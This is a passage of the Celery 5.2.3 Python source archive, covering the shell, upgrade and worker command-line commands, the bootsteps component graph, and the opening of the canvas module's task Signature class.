user_ns=locals).mainloop() def _no_ipython(self): # pragma: no cover raise ImportError('no suitable ipython found') def _invoke_default_shell(locals): try: import IPython # noqa except ImportError: try: import bpython # noqa except ImportError: _invoke_fallback_shell(locals) else: _invoke_bpython_shell(locals) else: _invoke_ipython_shell(locals) @click.command(cls=CeleryCommand) @click.option('-I', '--ipython', is_flag=True, cls=CeleryOption, help_group="Shell Options", help="Force IPython.") @click.option('-B', '--bpython', is_flag=True, cls=CeleryOption, help_group="Shell Options", help="Force bpython.") @click.option('--python', is_flag=True, cls=CeleryOption, help_group="Shell Options", help="Force default Python shell.") @click.option('-T', '--without-tasks', is_flag=True, cls=CeleryOption, help_group="Shell Options", help="Don't add tasks to locals.") @click.option('--eventlet', is_flag=True, cls=CeleryOption, help_group="Shell Options", help="Use eventlet.") @click.option('--gevent', is_flag=True, cls=CeleryOption, help_group="Shell Options", help="Use gevent.") @click.pass_context @handle_preload_options def shell(ctx, ipython=False, bpython=False, python=False, without_tasks=False, eventlet=False, gevent=False): """Start shell session with convenient access to celery symbols. The following symbols will be added to the main globals: - ``celery``: the current application. - ``chord``, ``group``, ``chain``, ``chunks``, ``xmap``, ``xstarmap`` ``subtask``, ``Task`` - all registered tasks. """ sys.path.insert(0, os.getcwd()) if eventlet: import_module('celery.concurrency.eventlet') if gevent: import_module('celery.concurrency.gevent') import celery app = ctx.obj.app app.loader.import_default_modules() # pylint: disable=attribute-defined-outside-init locals = { 'app': app, 'celery': app, 'Task': celery.Task, 'chord': celery.chord, 'group': celery.group, 'chain': celery.chain, 'chunks': celery.chunks, 'xmap': celery.xmap, 'xstarmap': celery.xstarmap, 'subtask': celery.subtask, 'signature': celery.signature, } if not without_tasks: locals.update({ task.__name__: task for task in app.tasks.values() if not task.name.startswith('celery.') }) if python: _invoke_fallback_shell(locals) elif bpython: try: _invoke_bpython_shell(locals) except ImportError: ctx.obj.echo(f'{ctx.obj.ERROR}: bpython is not installed') elif ipython: try: _invoke_ipython_shell(locals) except ImportError as e: ctx.obj.echo(f'{ctx.obj.ERROR}: {e}') _invoke_default_shell(locals) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/upgrade.py0000664000175000017500000000602700000000000016736 0ustar00asifasif00000000000000"""The ``celery upgrade`` command, used to upgrade from previous versions.""" import codecs import sys import click from celery.app import defaults from celery.bin.base import (CeleryCommand, CeleryOption, handle_preload_options) from celery.utils.functional import pass1 @click.group() @click.pass_context @handle_preload_options def upgrade(ctx): """Perform upgrade between versions.""" def _slurp(filename): # TODO: Handle case when file does not exist with codecs.open(filename, 'r', 'utf-8') as read_fh: return [line for line in read_fh] def _compat_key(key, namespace='CELERY'): key = key.upper() if not key.startswith(namespace): key = '_'.join([namespace, key]) return key def _backup(filename, suffix='.orig'): lines = [] backup_filename = ''.join([filename, suffix]) print(f'writing backup to {backup_filename}...', file=sys.stderr) 
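# The block below copies the original settings file, line by line, to
# "<filename><suffix>" (e.g. settings.py.orig for a hypothetical settings.py)
# before the rewritten settings are written back in place, and returns the
# original lines so they can be transformed.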
with codecs.open(filename, 'r', 'utf-8') as read_fh: with codecs.open(backup_filename, 'w', 'utf-8') as backup_fh: for line in read_fh: backup_fh.write(line) lines.append(line) return lines def _to_new_key(line, keyfilter=pass1, source=defaults._TO_NEW_KEY): # sort by length to avoid, for example, broker_transport overriding # broker_transport_options. for old_key in reversed(sorted(source, key=lambda x: len(x))): new_line = line.replace(old_key, keyfilter(source[old_key])) if line != new_line and 'CELERY_CELERY' not in new_line: return 1, new_line # only one match per line. return 0, line @upgrade.command(cls=CeleryCommand) @click.argument('filename') @click.option('--django', cls=CeleryOption, is_flag=True, help_group='Upgrading Options', help='Upgrade Django project.') @click.option('--compat', cls=CeleryOption, is_flag=True, help_group='Upgrading Options', help='Maintain backwards compatibility.') @click.option('--no-backup', cls=CeleryOption, is_flag=True, help_group='Upgrading Options', help="Don't backup original files.") def settings(filename, django, compat, no_backup): """Migrate settings from Celery 3.x to Celery 4.x.""" lines = _slurp(filename) keyfilter = _compat_key if django or compat else pass1 print(f'processing {filename}...', file=sys.stderr) # gives list of tuples: ``(did_change, line_contents)`` new_lines = [ _to_new_key(line, keyfilter) for line in lines ] if any(n[0] for n in new_lines): # did have changes if not no_backup: _backup(filename) with codecs.open(filename, 'w', 'utf-8') as write_fh: for _, line in new_lines: write_fh.write(line) print('Changes to your setting have been made!', file=sys.stdout) else: print('Does not seem to require any changes :-)', file=sys.stdout) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/celery/bin/worker.py0000664000175000017500000003076500000000000016626 0ustar00asifasif00000000000000"""Program used to start a Celery worker instance.""" import os import sys import click from click import ParamType from click.types import StringParamType from celery import concurrency from celery.bin.base import (COMMA_SEPARATED_LIST, LOG_LEVEL, CeleryDaemonCommand, CeleryOption, handle_preload_options) from celery.concurrency.base import BasePool from celery.exceptions import SecurityError from celery.platforms import (EX_FAILURE, EX_OK, detached, maybe_drop_privileges) from celery.utils.log import get_logger from celery.utils.nodenames import default_nodename, host_format, node_format logger = get_logger(__name__) class CeleryBeat(ParamType): """Celery Beat flag.""" name = "beat" def convert(self, value, param, ctx): if ctx.obj.app.IS_WINDOWS and value: self.fail('-B option does not work on Windows. ' 'Please run celery beat as a separate service.') return value class WorkersPool(click.Choice): """Workers pool option.""" name = "pool" def __init__(self): """Initialize the workers pool option with the relevant choices.""" super().__init__(concurrency.get_available_pool_names()) def convert(self, value, param, ctx): # Pools like eventlet/gevent needs to patch libs as early # as possible. if isinstance(value, type) and issubclass(value, BasePool): return value value = super().convert(value, param, ctx) worker_pool = ctx.obj.app.conf.worker_pool if value == 'prefork' and worker_pool: # If we got the default pool through the CLI # we need to check if the worker pool was configured. # If the worker pool was configured, we shouldn't use the default. 
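# In the branch below, when -P/--pool is left at its 'prefork' default but
# ``worker_pool`` is set in the app configuration, the configured pool wins;
# an explicit command-line choice (for example ``-P gevent``) differs from
# 'prefork' and therefore takes precedence.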
value = concurrency.get_implementation(worker_pool) else: value = concurrency.get_implementation(value) if not value: value = concurrency.get_implementation(worker_pool) return value class Hostname(StringParamType): """Hostname option.""" name = "hostname" def convert(self, value, param, ctx): return host_format(default_nodename(value)) class Autoscale(ParamType): """Autoscaling parameter.""" name = ", " def convert(self, value, param, ctx): value = value.split(',') if len(value) > 2: self.fail("Expected two comma separated integers or one integer." f"Got {len(value)} instead.") if len(value) == 1: try: value = (int(value[0]), 0) except ValueError: self.fail(f"Expected an integer. Got {value} instead.") try: return tuple(reversed(sorted(map(int, value)))) except ValueError: self.fail("Expected two comma separated integers." f"Got {value.join(',')} instead.") CELERY_BEAT = CeleryBeat() WORKERS_POOL = WorkersPool() HOSTNAME = Hostname() AUTOSCALE = Autoscale() C_FAKEFORK = os.environ.get('C_FAKEFORK') def detach(path, argv, logfile=None, pidfile=None, uid=None, gid=None, umask=None, workdir=None, fake=False, app=None, executable=None, hostname=None): """Detach program by argv.""" fake = 1 if C_FAKEFORK else fake # `detached()` will attempt to touch the logfile to confirm that error # messages won't be lost after detaching stdout/err, but this means we need # to pre-format it rather than relying on `setup_logging_subsystem()` like # we can elsewhere. logfile = node_format(logfile, hostname) with detached(logfile, pidfile, uid, gid, umask, workdir, fake, after_forkers=False): try: if executable is not None: path = executable os.execv(path, [path] + argv) return EX_OK except Exception: # pylint: disable=broad-except if app is None: from celery import current_app app = current_app app.log.setup_logging_subsystem( 'ERROR', logfile, hostname=hostname) logger.critical("Can't exec %r", ' '.join([path] + argv), exc_info=True) return EX_FAILURE @click.command(cls=CeleryDaemonCommand, context_settings={'allow_extra_args': True}) @click.option('-n', '--hostname', default=host_format(default_nodename(None)), cls=CeleryOption, type=HOSTNAME, help_group="Worker Options", help="Set custom hostname (e.g., 'w1@%%h'). " "Expands: %%h (hostname), %%n (name) and %%d, (domain).") @click.option('-D', '--detach', cls=CeleryOption, is_flag=True, default=False, help_group="Worker Options", help="Start worker as a background process.") @click.option('-S', '--statedb', cls=CeleryOption, type=click.Path(), callback=lambda ctx, _, value: value or ctx.obj.app.conf.worker_state_db, help_group="Worker Options", help="Path to the state database. The extension '.db' may be " "appended to the filename.") @click.option('-l', '--loglevel', default='WARNING', cls=CeleryOption, type=LOG_LEVEL, help_group="Worker Options", help="Logging level.") @click.option('optimization', '-O', default='default', cls=CeleryOption, type=click.Choice(('default', 'fair')), help_group="Worker Options", help="Apply optimization profile.") @click.option('--prefetch-multiplier', type=int, metavar="", callback=lambda ctx, _, value: value or ctx.obj.app.conf.worker_prefetch_multiplier, cls=CeleryOption, help_group="Worker Options", help="Set custom prefetch multiplier value " "for this worker instance.") @click.option('-c', '--concurrency', type=int, metavar="", callback=lambda ctx, _, value: value or ctx.obj.app.conf.worker_concurrency, cls=CeleryOption, help_group="Pool Options", help="Number of child processes processing the queue. 
" "The default is the number of CPUs available" " on your system.") @click.option('-P', '--pool', default='prefork', type=WORKERS_POOL, cls=CeleryOption, help_group="Pool Options", help="Pool implementation.") @click.option('-E', '--task-events', '--events', is_flag=True, default=None, cls=CeleryOption, help_group="Pool Options", help="Send task-related events that can be captured by monitors" " like celery events, celerymon, and others.") @click.option('--time-limit', type=float, cls=CeleryOption, help_group="Pool Options", help="Enables a hard time limit " "(in seconds int/float) for tasks.") @click.option('--soft-time-limit', type=float, cls=CeleryOption, help_group="Pool Options", help="Enables a soft time limit " "(in seconds int/float) for tasks.") @click.option('--max-tasks-per-child', type=int, cls=CeleryOption, help_group="Pool Options", help="Maximum number of tasks a pool worker can execute before " "it's terminated and replaced by a new worker.") @click.option('--max-memory-per-child', type=int, cls=CeleryOption, help_group="Pool Options", help="Maximum amount of resident memory, in KiB, that may be " "consumed by a child process before it will be replaced " "by a new one. If a single task causes a child process " "to exceed this limit, the task will be completed and " "the child process will be replaced afterwards.\n" "Default: no limit.") @click.option('--purge', '--discard', is_flag=True, cls=CeleryOption, help_group="Queue Options") @click.option('--queues', '-Q', type=COMMA_SEPARATED_LIST, cls=CeleryOption, help_group="Queue Options") @click.option('--exclude-queues', '-X', type=COMMA_SEPARATED_LIST, cls=CeleryOption, help_group="Queue Options") @click.option('--include', '-I', type=COMMA_SEPARATED_LIST, cls=CeleryOption, help_group="Queue Options") @click.option('--without-gossip', is_flag=True, cls=CeleryOption, help_group="Features") @click.option('--without-mingle', is_flag=True, cls=CeleryOption, help_group="Features") @click.option('--without-heartbeat', is_flag=True, cls=CeleryOption, help_group="Features", ) @click.option('--heartbeat-interval', type=int, cls=CeleryOption, help_group="Features", ) @click.option('--autoscale', type=AUTOSCALE, cls=CeleryOption, help_group="Features", ) @click.option('-B', '--beat', type=CELERY_BEAT, cls=CeleryOption, is_flag=True, help_group="Embedded Beat Options") @click.option('-s', '--schedule-filename', '--schedule', callback=lambda ctx, _, value: value or ctx.obj.app.conf.beat_schedule_filename, cls=CeleryOption, help_group="Embedded Beat Options") @click.option('--scheduler', cls=CeleryOption, help_group="Embedded Beat Options") @click.pass_context @handle_preload_options def worker(ctx, hostname=None, pool_cls=None, app=None, uid=None, gid=None, loglevel=None, logfile=None, pidfile=None, statedb=None, **kwargs): """Start worker instance. 
Examples -------- $ celery --app=proj worker -l INFO $ celery -A proj worker -l INFO -Q hipri,lopri $ celery -A proj worker --concurrency=4 $ celery -A proj worker --concurrency=1000 -P eventlet $ celery worker --autoscale=10,0 """ try: app = ctx.obj.app if ctx.args: try: app.config_from_cmdline(ctx.args, namespace='worker') except (KeyError, ValueError) as e: # TODO: Improve the error messages raise click.UsageError( "Unable to parse extra configuration from command line.\n" f"Reason: {e}", ctx=ctx) if kwargs.get('detach', False): argv = ['-m', 'celery'] + sys.argv[1:] if '--detach' in argv: argv.remove('--detach') if '-D' in argv: argv.remove('-D') return detach(sys.executable, argv, logfile=logfile, pidfile=pidfile, uid=uid, gid=gid, umask=kwargs.get('umask', None), workdir=kwargs.get('workdir', None), app=app, executable=kwargs.get('executable', None), hostname=hostname) maybe_drop_privileges(uid=uid, gid=gid) worker = app.Worker( hostname=hostname, pool_cls=pool_cls, loglevel=loglevel, logfile=logfile, # node format handled by celery.app.log.setup pidfile=node_format(pidfile, hostname), statedb=node_format(statedb, hostname), no_color=ctx.obj.no_color, quiet=ctx.obj.quiet, **kwargs) worker.start() return worker.exitcode except SecurityError as e: ctx.obj.error(e.args[0]) ctx.exit(1) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bootsteps.py0000664000175000017500000003001100000000000016547 0ustar00asifasif00000000000000"""A directed acyclic graph of reusable components.""" from collections import deque from threading import Event from kombu.common import ignore_errors from kombu.utils.encoding import bytes_to_str from kombu.utils.imports import symbol_by_name from .utils.graph import DependencyGraph, GraphFormatter from .utils.imports import instantiate, qualname from .utils.log import get_logger try: from greenlet import GreenletExit except ImportError: # pragma: no cover IGNORE_ERRORS = () else: IGNORE_ERRORS = (GreenletExit,) __all__ = ('Blueprint', 'Step', 'StartStopStep', 'ConsumerStep') #: States RUN = 0x1 CLOSE = 0x2 TERMINATE = 0x3 logger = get_logger(__name__) def _pre(ns, fmt): return f'| {ns.alias}: {fmt}' def _label(s): return s.name.rsplit('.', 1)[-1] class StepFormatter(GraphFormatter): """Graph formatter for :class:`Blueprint`.""" blueprint_prefix = '⧉' conditional_prefix = '∘' blueprint_scheme = { 'shape': 'parallelogram', 'color': 'slategray4', 'fillcolor': 'slategray3', } def label(self, step): return step and '{}{}'.format( self._get_prefix(step), bytes_to_str( (step.label or _label(step)).encode('utf-8', 'ignore')), ) def _get_prefix(self, step): if step.last: return self.blueprint_prefix if step.conditional: return self.conditional_prefix return '' def node(self, obj, **attrs): scheme = self.blueprint_scheme if obj.last else self.node_scheme return self.draw_node(obj, scheme, attrs) def edge(self, a, b, **attrs): if a.last: attrs.update(arrowhead='none', color='darkseagreen3') return self.draw_edge(a, b, self.edge_scheme, attrs) class Blueprint: """Blueprint containing bootsteps that can be applied to objects. Arguments: steps Sequence[Union[str, Step]]: List of steps. name (str): Set explicit name for this blueprint. on_start (Callable): Optional callback applied after blueprint start. on_close (Callable): Optional callback applied before blueprint close. on_stopped (Callable): Optional callback applied after blueprint stopped. 
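Example (illustrative only; ``MyStep`` and ``worker`` stand in for a real
bootstep class and its parent object):

    blueprint = Blueprint([MyStep], name='worker.Blueprint')
    blueprint.apply(worker)
    blueprint.start(worker)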
""" GraphFormatter = StepFormatter name = None state = None started = 0 default_steps = set() state_to_name = { 0: 'initializing', RUN: 'running', CLOSE: 'closing', TERMINATE: 'terminating', } def __init__(self, steps=None, name=None, on_start=None, on_close=None, on_stopped=None): self.name = name or self.name or qualname(type(self)) self.types = set(steps or []) | set(self.default_steps) self.on_start = on_start self.on_close = on_close self.on_stopped = on_stopped self.shutdown_complete = Event() self.steps = {} def start(self, parent): self.state = RUN if self.on_start: self.on_start() for i, step in enumerate(s for s in parent.steps if s is not None): self._debug('Starting %s', step.alias) self.started = i + 1 step.start(parent) logger.debug('^-- substep ok') def human_state(self): return self.state_to_name[self.state or 0] def info(self, parent): info = {} for step in parent.steps: info.update(step.info(parent) or {}) return info def close(self, parent): if self.on_close: self.on_close() self.send_all(parent, 'close', 'closing', reverse=False) def restart(self, parent, method='stop', description='restarting', propagate=False): self.send_all(parent, method, description, propagate=propagate) def send_all(self, parent, method, description=None, reverse=True, propagate=True, args=()): description = description or method.replace('_', ' ') steps = reversed(parent.steps) if reverse else parent.steps for step in steps: if step: fun = getattr(step, method, None) if fun is not None: self._debug('%s %s...', description.capitalize(), step.alias) try: fun(parent, *args) except Exception as exc: # pylint: disable=broad-except if propagate: raise logger.exception( 'Error on %s %s: %r', description, step.alias, exc) def stop(self, parent, close=True, terminate=False): what = 'terminating' if terminate else 'stopping' if self.state in (CLOSE, TERMINATE): return if self.state != RUN or self.started != len(parent.steps): # Not fully started, can safely exit. self.state = TERMINATE self.shutdown_complete.set() return self.close(parent) self.state = CLOSE self.restart( parent, 'terminate' if terminate else 'stop', description=what, propagate=False, ) if self.on_stopped: self.on_stopped() self.state = TERMINATE self.shutdown_complete.set() def join(self, timeout=None): try: # Will only get here if running green, # makes sure all greenthreads have exited. self.shutdown_complete.wait(timeout=timeout) except IGNORE_ERRORS: pass def apply(self, parent, **kwargs): """Apply the steps in this blueprint to an object. This will apply the ``__init__`` and ``include`` methods of each step, with the object as argument:: step = Step(obj) ... step.include(obj) For :class:`StartStopStep` the services created will also be added to the objects ``steps`` attribute. 
""" self._debug('Preparing bootsteps.') order = self.order = [] steps = self.steps = self.claim_steps() self._debug('Building graph...') for S in self._finalize_steps(steps): step = S(parent, **kwargs) steps[step.name] = step order.append(step) self._debug('New boot order: {%s}', ', '.join(s.alias for s in self.order)) for step in order: step.include(parent) return self def connect_with(self, other): self.graph.adjacent.update(other.graph.adjacent) self.graph.add_edge(type(other.order[0]), type(self.order[-1])) def __getitem__(self, name): return self.steps[name] def _find_last(self): return next((C for C in self.steps.values() if C.last), None) def _firstpass(self, steps): for step in steps.values(): step.requires = [symbol_by_name(dep) for dep in step.requires] stream = deque(step.requires for step in steps.values()) while stream: for node in stream.popleft(): node = symbol_by_name(node) if node.name not in self.steps: steps[node.name] = node stream.append(node.requires) def _finalize_steps(self, steps): last = self._find_last() self._firstpass(steps) it = ((C, C.requires) for C in steps.values()) G = self.graph = DependencyGraph( it, formatter=self.GraphFormatter(root=last), ) if last: for obj in G: if obj != last: G.add_edge(last, obj) try: return G.topsort() except KeyError as exc: raise KeyError('unknown bootstep: %s' % exc) def claim_steps(self): return dict(self.load_step(step) for step in self.types) def load_step(self, step): step = symbol_by_name(step) return step.name, step def _debug(self, msg, *args): return logger.debug(_pre(self, msg), *args) @property def alias(self): return _label(self) class StepType(type): """Meta-class for steps.""" name = None requires = None def __new__(cls, name, bases, attrs): module = attrs.get('__module__') qname = f'{module}.{name}' if module else name attrs.update( __qualname__=qname, name=attrs.get('name') or qname, ) return super().__new__(cls, name, bases, attrs) def __str__(cls): return cls.name def __repr__(cls): return 'step:{0.name}{{{0.requires!r}}}'.format(cls) class Step(metaclass=StepType): """A Bootstep. The :meth:`__init__` method is called when the step is bound to a parent object, and can as such be used to initialize attributes in the parent object at parent instantiation-time. """ #: Optional step name, will use ``qualname`` if not specified. name = None #: Optional short name used for graph outputs and in logs. label = None #: Set this to true if the step is enabled based on some condition. conditional = False #: List of other steps that that must be started before this step. #: Note that all dependencies must be in the same blueprint. requires = () #: This flag is reserved for the workers Consumer, #: since it is required to always be started last. #: There can only be one object marked last #: in every blueprint. last = False #: This provides the default for :meth:`include_if`. enabled = True def __init__(self, parent, **kwargs): pass def include_if(self, parent): """Return true if bootstep should be included. You can define this as an optional predicate that decides whether this step should be created. 
""" return self.enabled def instantiate(self, name, *args, **kwargs): return instantiate(name, *args, **kwargs) def _should_include(self, parent): if self.include_if(parent): return True, self.create(parent) return False, None def include(self, parent): return self._should_include(parent)[0] def create(self, parent): """Create the step.""" def __repr__(self): return f'' @property def alias(self): return self.label or _label(self) def info(self, obj): pass class StartStopStep(Step): """Bootstep that must be started and stopped in order.""" #: Optional obj created by the :meth:`create` method. #: This is used by :class:`StartStopStep` to keep the #: original service object. obj = None def start(self, parent): if self.obj: return self.obj.start() def stop(self, parent): if self.obj: return self.obj.stop() def close(self, parent): pass def terminate(self, parent): if self.obj: return getattr(self.obj, 'terminate', self.obj.stop)() def include(self, parent): inc, ret = self._should_include(parent) if inc: self.obj = ret parent.steps.append(self) return inc class ConsumerStep(StartStopStep): """Bootstep that starts a message consumer.""" requires = ('celery.worker.consumer:Connection',) consumers = None def get_consumers(self, channel): raise NotImplementedError('missing get_consumers') def start(self, c): channel = c.connection.channel() self.consumers = self.get_consumers(channel) for consumer in self.consumers or []: consumer.consume() def stop(self, c): self._close(c, True) def shutdown(self, c): self._close(c, False) def _close(self, c, cancel_consumers=True): channels = set() for consumer in self.consumers or []: if cancel_consumers: ignore_errors(c.connection, consumer.cancel) if consumer.channel: channels.add(consumer.channel) for channel in channels: ignore_errors(c.connection, channel.close) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/celery/canvas.py0000664000175000017500000017346700000000000016027 0ustar00asifasif00000000000000"""Composing task work-flows. .. seealso: You should import these from :mod:`celery` and not this module. 
""" import itertools import operator from collections import deque from collections.abc import MutableSequence from copy import deepcopy from functools import partial as _partial from functools import reduce from operator import itemgetter from types import GeneratorType from kombu.utils.functional import fxrange, reprcall from kombu.utils.objects import cached_property from kombu.utils.uuid import uuid from vine import barrier from celery._state import current_app from celery.result import GroupResult, allow_join_result from celery.utils import abstract from celery.utils.collections import ChainMap from celery.utils.functional import _regen from celery.utils.functional import chunks as _chunks from celery.utils.functional import (is_list, lookahead, maybe_list, regen, seq_concat_item, seq_concat_seq) from celery.utils.objects import getitem_property from celery.utils.text import remove_repeating_from_task, truncate __all__ = ( 'Signature', 'chain', 'xmap', 'xstarmap', 'chunks', 'group', 'chord', 'signature', 'maybe_signature', ) def maybe_unroll_group(group): """Unroll group with only one member.""" # Issue #1656 try: size = len(group.tasks) except TypeError: try: size = group.tasks.__length_hint__() except (AttributeError, TypeError): return group else: return list(group.tasks)[0] if size == 1 else group else: return group.tasks[0] if size == 1 else group def task_name_from(task): return getattr(task, 'name', task) @abstract.CallableSignature.register class Signature(dict): """Task Signature. Class that wraps the arguments and execution options for a single task invocation. Used as the parts in a :class:`group` and other constructs, or to pass tasks around as callbacks while being compatible with serializers with a strict type subset. Signatures can also be created from tasks: - Using the ``.signature()`` method that has the same signature as ``Task.apply_async``: .. code-block:: pycon >>> add.signature(args=(1,), kwargs={'kw': 2}, options={}) - or the ``.s()`` shortcut that works for star arguments: .. code-block:: pycon >>> add.s(1, kw=2) - the ``.s()`` shortcut does not allow you to specify execution options but there's a chaning `.set` method that returns the signature: .. code-block:: pycon >>> add.s(2, 2).set(countdown=10).set(expires=30).delay() Note: You should use :func:`~celery.signature` to create new signatures. The ``Signature`` class is the type returned by that function and should be used for ``isinstance`` checks for signatures. See Also: :ref:`guide-canvas` for the complete guide. Arguments: task (Union[Type[celery.app.task.Task], str]): Either a task class/instance, or the name of a task. args (Tuple): Positional arguments to apply. kwargs (Dict): Keyword arguments to apply. options (Dict): Additional options to :meth:`Task.apply_async`. 
Note: If the first argument is a :class:`dict`, the other arguments will be ignored and the values in the dict will be used instead:: >>> s = signature('tasks.add', args=(2, 2)) >>> signature(s) {'task': 'tasks.add', args=(2, 2), kwargs={}, options={}} """ TYPES = {} _app = _type = None # The following fields must not be changed during freezing/merging because # to do so would disrupt completion of parent tasks _IMMUTABLE_OPTIONS = {"group_id"} @classmethod def register_type(cls, name=None): def _inner(subclass): cls.TYPES[name or subclass.__name__] = subclass return subclass return _inner @classmethod def from_dict(cls, d, app=None): typ = d.get('subtask_type') if typ: target_cls = cls.TYPES[typ] if target_cls is not cls: return target_cls.from_dict(d, app=app) return Signature(d, app=app) def __init__(self, task=None, args=None, kwargs=None, options=None, type=None, subtask_type=None, immutable=False, app=None, **ex): self._app = app if isinstance(task, dict): super().__init__(task) # works like dict(d) else: # Also supports using task class/instance instead of string name. try: task_name = task.name except AttributeError: task_name = task else: self._type = task super().__init__( task=task_name, args=tuple(args or ()), kwargs=kwargs or {}, options=dict(options or {}, **ex), subtask_type=subtask_type, immutable=immutable, ) def __call__(self, *partial_args, **partial_kwargs): """Call the task directly (in the current process).""" args, kwargs, _ = self._merge(partial_args, partial_kwargs, None) return self.type(*args, **kwargs) def delay(self, *partial_args, **partial_kwargs): """Shortcut to :meth:`apply_async` using star arguments.""" return self.apply_async(partial_args, partial_kwargs) def apply(self, args=None, kwargs=None, **options): """Call task locally. Same as :meth:`apply_async` but executed the task inline instead of sending a task message. """ args = args if args else () kwargs = kwargs if kwargs else {} # Extra options set to None are dismissed options = {k: v for k, v in options.items() if v is not None} # For callbacks: extra args are prepended to the stored args. args, kwargs, options = self._merge(args, kwargs, options) return self.type.apply(args, kwargs, **options) def apply_async(self, args=None, kwargs=None, route_name=None, **options): """Apply this task asynchronously. Arguments: args (Tuple): Partial args to be prepended to the existing args. kwargs (Dict): Partial kwargs to be merged with existing kwargs. options (Dict): Partial options to be merged with existing options. Returns: ~@AsyncResult: promise of future evaluation. See also: :meth:`~@Task.apply_async` and the :ref:`guide-calling` guide. """ args = args if args else () kwargs = kwargs if kwargs else {} # Extra options set to None are dismissed options = {k: v for k, v in options.items() if v is not None} try: _apply = self._apply_async except IndexError: # pragma: no cover # no tasks for chain, etc to find type return # For callbacks: extra args are prepended to the stored args. 
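        # Illustrative sketch (``add`` is a stand-in task, not defined here):
        #     add.s(2).apply_async((8,))   # ends up calling add(8, 2)
        #     add.s(2).set(countdown=5).apply_async(countdown=1)  # countdown=1 wins
        # i.e. call-time args come first and call-time options override the
        # stored ones, except for the immutable keys that _merge() protects.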
if args or kwargs or options: args, kwargs, options = self._merge(args, kwargs, options) else: args, kwargs, options = self.args, self.kwargs, self.options # pylint: disable=too-many-function-args # Borks on this, as it's a property return _apply(args, kwargs, **options) def _merge(self, args=None, kwargs=None, options=None, force=False): args = args if args else () kwargs = kwargs if kwargs else {} if options is not None: # We build a new options dictionary where values in `options` # override values in `self.options` except for keys which are # noted as being immutable (unrelated to signature immutability) # implying that allowing their value to change would stall tasks new_options = dict(self.options, **{ k: v for k, v in options.items() if k not in self._IMMUTABLE_OPTIONS or k not in self.options }) else: new_options = self.options if self.immutable and not force: return (self.args, self.kwargs, new_options) return (tuple(args) + tuple(self.args) if args else self.args, dict(self.kwargs, **kwargs) if kwargs else self.kwargs, new_options) def clone(self, args=None, kwargs=None, **opts): """Create a copy of this signature. Arguments: args (Tuple): Partial args to be prepended to the existing args. kwargs (Dict): Partial kwargs to be merged with existing kwargs. options (Dict): Partial options to be merged with existing options. """ args = args if args else () kwargs = kwargs if kwargs else {} # need to deepcopy options so origins links etc. is not modified. if args or kwargs or opts: args, kwargs, opts = self._merge(args, kwargs, opts) else: args, kwargs, opts = self.args, self.kwargs, self.options signature = Signature.from_dict({'task': self.task, 'args': tuple(args), 'kwargs': kwargs, 'options': deepcopy(opts), 'subtask_type': self.subtask_type, 'immutable': self.immutable}, app=self._app) signature._type = self._type return signature partial = clone def freeze(self, _id=None, group_id=None, chord=None, root_id=None, parent_id=None, group_index=None): """Finalize the signature by adding a concrete task id. The task won't be called and you shouldn't call the signature twice after freezing it as that'll result in two task messages using the same task id. Returns: ~@AsyncResult: promise of future evaluation. """ # pylint: disable=redefined-outer-name # XXX chord is also a class in outer scope. opts = self.options try: # if there is already an id for this task, return it tid = opts['task_id'] except KeyError: # otherwise, use the _id sent to this function, falling back on a generated UUID tid = opts['task_id'] = _id or uuid() if root_id: opts['root_id'] = root_id if parent_id: opts['parent_id'] = parent_id if 'reply_to' not in opts: # fall back on unique ID for this thread in the app opts['reply_to'] = self.app.thread_oid if group_id and "group_id" not in opts: opts['group_id'] = group_id if chord: opts['chord'] = chord if group_index is not None: opts['group_index'] = group_index # pylint: disable=too-many-function-args # Borks on this, as it's a property. return self.AsyncResult(tid) _freeze = freeze def replace(self, args=None, kwargs=None, options=None): """Replace the args, kwargs or options set for this signature. These are only replaced if the argument for the section is not :const:`None`. 
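        Example (``add`` is a stand-in task):

        .. code-block:: pycon

            >>> s = add.s(2, 2)
            >>> s.replace(args=(4, 4)).args
            (4, 4)
            >>> s.args    # the original signature is left untouched
            (2, 2)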
""" signature = self.clone() if args is not None: signature.args = args if kwargs is not None: signature.kwargs = kwargs if options is not None: signature.options = options return signature def set(self, immutable=None, **options): """Set arbitrary execution options (same as ``.options.update(…)``). Returns: Signature: This is a chaining method call (i.e., it will return ``self``). """ if immutable is not None: self.set_immutable(immutable) self.options.update(options) return self def set_immutable(self, immutable): self.immutable = immutable def _with_list_option(self, key): items = self.options.setdefault(key, []) if not isinstance(items, MutableSequence): items = self.options[key] = [items] return items def append_to_list_option(self, key, value): items = self._with_list_option(key) if value not in items: items.append(value) return value def extend_list_option(self, key, value): items = self._with_list_option(key) items.extend(maybe_list(value)) def link(self, callback): """Add callback task to be applied if this task succeeds. Returns: Signature: the argument passed, for chaining or use with :func:`~functools.reduce`. """ return self.append_to_list_option('link', callback) def link_error(self, errback): """Add callback task to be applied on error in task execution. Returns: Signature: the argument passed, for chaining or use with :func:`~functools.reduce`. """ return self.append_to_list_option('link_error', errback) def on_error(self, errback): """Version of :meth:`link_error` that supports chaining. on_error chains the original signature, not the errback so:: >>> add.s(2, 2).on_error(errback.s()).delay() calls the ``add`` task, not the ``errback`` task, but the reverse is true for :meth:`link_error`. """ self.link_error(errback) return self def flatten_links(self): """Return a recursive list of dependencies. "unchain" if you will, but with links intact. """ return list(itertools.chain.from_iterable(itertools.chain( [[self]], (link.flatten_links() for link in maybe_list(self.options.get('link')) or []) ))) def __or__(self, other): if isinstance(other, _chain): # task | chain -> chain return _chain(seq_concat_seq( (self,), other.unchain_tasks()), app=self._app) elif isinstance(other, group): # unroll group with one member other = maybe_unroll_group(other) # task | group() -> chain return _chain(self, other, app=self.app) elif isinstance(other, Signature): # task | task -> chain return _chain(self, other, app=self._app) return NotImplemented def __ior__(self, other): # Python 3.9 introduces | as the merge operator for dicts. # We override the in-place version of that operator # so that canvases continue to work as they did before. return self.__or__(other) def election(self): type = self.type app = type.app tid = self.options.get('task_id') or uuid() with app.producer_or_acquire(None) as producer: props = type.backend.on_task_call(producer, tid) app.control.election(tid, 'task', self.clone(task_id=tid, **props), connection=producer.connection) return type.AsyncResult(tid) def reprcall(self, *args, **kwargs): args, kwargs, _ = self._merge(args, kwargs, {}, force=True) return reprcall(self['task'], args, kwargs) def 